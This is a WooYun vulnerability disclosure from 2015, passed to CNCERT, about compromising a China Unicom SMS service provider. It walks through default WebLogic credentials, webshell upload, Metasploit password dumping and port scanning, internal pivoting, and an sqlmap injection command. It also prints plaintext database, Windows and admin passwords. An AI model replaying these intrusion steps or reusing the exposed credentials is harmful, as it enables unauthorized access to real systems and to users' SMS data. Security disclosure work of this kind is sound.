当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157221

漏洞标题:中国联通某短信业务服务商CP系统多处漏洞打包可以控制上行号收发短信+内网真的漫游了(泄漏过上千万条短信/已发现黑客后门)

相关厂商:中国联通

漏洞作者: 殺器王子

提交时间:2015-12-01 11:36

修复时间:2016-01-18 13:20

公开时间:2016-01-18 13:20

漏洞类型:文件包含

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

为时三天,感谢红老师大力支持陪我走过无数坑。。。。
该洞可以更深入的。。。。

详细说明:

首先http://**.**.**.**:9080/console/ 存在弱口令

weblogic/weblogic


1.png

得知是库站分离,当前服务器ip是**.**.**.**,当然这是后话了
服务器java版本安全级别比较低,且该版本比较旧,部分功能没用加载出来。
当时因为服务器问题,很多war没用部署成功,后来发现别人了后门,证明这里的确是可以上传的,然后摸索了半天发现

2.png

3.png


上传文件后,要开启一个什么鬼服务才能成功执行文件,且不是所有war的后门都支持。坑啊!

4.png

成功写入一句话,权限很大可以直接添加用户。且根据端口判断只有

5.png

连上服务器发现另一个内网中的数据,当时通过判断该网段内只有4台服务器。(后来又新启动了2台是什么情况。。。)

6.jpg

可以在上面找到很多备份网站的源码,且翻到管理员桌面的好东西,在目录下找了一些配置文件发现

URL="jdbc:microsoft:sqlserver**.**.**.**:2433"/>
    <JDBCConnectionPool
        DriverName="com.microsoft.jdbc.sqlserver.SQLServerDriver"
        Name="SystemPool" Password="{3DES}s/BAZAyTsg4XOsbn1xTMeg=="


JMail.ContentType = "text/html" '邮件正文格式
JMail.MailServerUserName = "unisk" '登录用户名
JMail.MailServerPassWord = "*****先马赛克一下" '登录密码
JMail.MailDomain = "**.**.**.**" '域名
JMail.AddRecipient "portal@**.**.**.**","portal" '收信人


com.sms.database.key0.driver =com.microsoft.jdbc.sqlserver.SQLServerDriver
com.sms.database.key0.path = jdbc:microsoft:sqlserver**.**.**.**:1433;DatabaseName=SmsClub
com.sms.database.key0.user = smsclub
com.sms.database.key0.pass = dbunisk@123


bindaddr=**.**.**.**
dbConString=jdbc:microsoft:sqlserver**.**.**.**:1433;databasename=smdbc
dbDrvString=com.microsoft.jdbc.sqlserver.SQLServerDriver
dbUser=dbunisk
dbPwd=dbunisk4e3w4s3a
mincon=2
maxcon=30


感觉可以撸无数个内网了。。
接着利用MSF的getpass导出了当前管理密码

* 用户: uniskwap1
* 域  : WIN-FJFHVQ6H85H
* 密码: [Unisk@014]


7.jpg

一个日志文件让我坚信继续搞,可以控制短信。。

msf auxiliary(smb_version) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set THREADS 24
THREADS => 24
msf auxiliary(tcp) > set PORTS 21, 22, 23, 80, 1433, 2433, 3389, 3306, 1521, 8080, 8090, 9080, 43958, 4899, 15001
PORTS => 21, 22, 23, 80, 1433, 2433, 3389, 3306, 1521, 8080, 8090, 9080, 43958, 4899, 15001
msf auxiliary(tcp) > set RHOSTS **.**.**.**/24
RHOSTS => **.**.**.**/24
msf auxiliary(tcp) > run -j
[*] Auxiliary module running as background job
[*] **.**.**.**:23 - TCP OPEN
[*] **.**.**.**:22 - TCP OPEN
[*] **.**.**.**:80 - TCP OPEN
[*] **.**.**.**:23 - TCP OPEN
[*] **.**.**.**:22 - TCP OPEN
[*] **.**.**.**:80 - TCP OPEN
[*] Scanned  32 of 256 hosts (12% complete)
[*] Scann


继续扫

8.jpg

发现内网的**.**.**.**38和当前服务器网站ip服务是同样的,且138才是真正的业务控制服务器。通过同样的漏洞拿下138的权限

9.jpg

10.jpg

发现138服务器有4个网卡,说明同时处在4个内网中。
又getpass

UserName: uniskwap1
LogonDomain: SVCTAG-6J8G43X
password: Uniskqixiang33


果然138才是关键,拿到后台密码
admin | wx@2015

12.jpg

支持批量推送短信,彩信,等等。

11.jpg


111.jpg


其中

13.jpg


暴露大量短信接口

**.**.**.**/mms/doubleConfirm?
注册名    DGh39An5 密码  dgH39aN5  服务名称  联通时科彩信二次确认 备注 1065552266
http://**.**.**.**/sms/sms_call_back?
注册名    open 密码  sms@2015*  服务名称  模板短信 备注 1065552200001
服务ip **.**.**.**,**.**.**.**,**.**.**.**,
http://**.**.**.**/smsPlatReceive/receiveSmsResult?
注册名    test 密码  20150525  服务名称smsPlat  模板短信 备注 
服务ip **.**.**.**,**.**.**.**,**.**.**.**,**.**.**.**,**.**.**.**,
http://**.**.**.**/sms/txz_ota_10655581?
注册名    TXZ_OTA 密码  Unisk!2015@  服务名称通行证OTA  模板短信 备注 106555222
服务ip **.**.**.**,**.**.**.**,**.**.**.**,


先看看目前网络拓扑图

14.png


15.jpg


上面也有主动备份源码且还有cp客户端。
目前138已经没什么利用价值,看下一个
前面提到的

URL="jdbc:microsoft:sqlserver**.**.**.**:2433"/>
    <JDBCConnectionPool
        DriverName="com.microsoft.jdbc.sqlserver.SQLServerDriver"
        Name="SystemPool" Password="{3DES}s/BAZAyTsg4XOsbn1xTMeg=="


该解密比较麻烦,采用weblogic的3DES加密。解密比较费时,解密后利用sqlsever差异备份getshell,

17.jpg

16.jpg

然后装了360,苦于无法提权,服务器打了大量的补丁很是蛋疼,但是查看进程的时候发现了有点不对劲。

17.png


发现多了一个svc0st.exe的进程,且ip指向一个美国服务器的ip,而且直接访问是跳转的3322多页面,很明显是被挂马了。
但是不晓得是怎么绕过360的。

18.png

可以看的该黑客早在2015年8月份就已经拿下权限,且在一个月后就留下后门CatRoot2(键盘记录器)。有人说该文件是系统文件,有的说是后门,但是我看创建时间还是比较可疑的,推荐自查一下。
什么?你说并没有什么卵用,最后才是高潮你懂吧。

19.png

20.jpg


21.jpg

当前字段截止当前一共是111041642条记录。且该数据一直在实时更新中,其中包含了的一些通行证验证码,某些联通业务登陆的随机密码。
到这里我已经日不动了。。。。上面泄漏的信息可以再深挖其他的内网。

漏洞证明:

接上,根据上面拿到的某短信接口

http://**.**.**.**/smsPlatReceive/receiveSmsResult?
注册名    test 密码  20150525  服务名称smsPlat  模板短信 备注


—url="http://**.**.**.**/smsPlatSend/list" -p "sendNumber" —data="pageNum=1&numPerPage=20&orderField=&orderDirection=&sendNumber=17604174024&smsAccountName=&startDate=&endDate=&timeType=" —dbms=mysql —cookie="JSESSIONID=5931296F5BA8AE18E02A0DEAB572E706; rememberMe=7tveXX7X2EkDQS+0zTcQsngvsd2toNWqw34VuCGbaEsdQmil3ZD4Oc2jM5hJAOaN7nQVapJYvqpHNCwBHx+6dhUzBXTwovF2ptdiiyPFdIN9OTUcN5y+B0qv8foMZtsaOhlidWgu65eJvnavV5PH7gWaTPMpAZysSpN22qa7XIa+N2TYoyftlp3KidznQ5sUyDNUrKRWZekcCdMwdQhq8OuWvJ2v+Qp3qX7wehtdMT6de4VQCoSWnknCgFq6nOXX8Z0OsC1+pXDQkHYVV2u0tyu2L2Ykz61If6D2ojxW5Nz9vmcN1bjgJywjdzegs5Q1XwXWzQO46VRWalXaQ7cdvt/zSq6EWskhFQcKPGLuC2D+8y8ArtogL/0i69DAFYOXlBgU79qG58rehS0aRHAsFmlqM1jA9ougVngo3utctcLQNsqRXX5pzvWlcK96uU4bOGBC6L8TrqyXq0pLIIosSuAQX3H42k+VyKwybSQZyRk=" —current-db -D "unisk_internet_market"


发现**.**.**.**该管理后台存在弱口令+注入,

22.png

23.png


其中先跑弱口令,

24.png


test | 11111111


25.jpg

发现了羞羞的内容,发现该平台不但可以推送短信,还可以收短信

26.jpg

这个是该账号发送的短信号码。
这里是收到的短信

27.png

28.png

每个账号对应相应的上行号码(发送号码),该账号只能看到自己的上行号。
可以看到该账号支持发送短信至少还有1万次。
用来联通的号码推送广告,url,彩信,风险挺大的。。。

修复方案:

不要让黑产永远都比你快一步

版权声明:转载请注明来源 殺器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-12-04 13:17

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无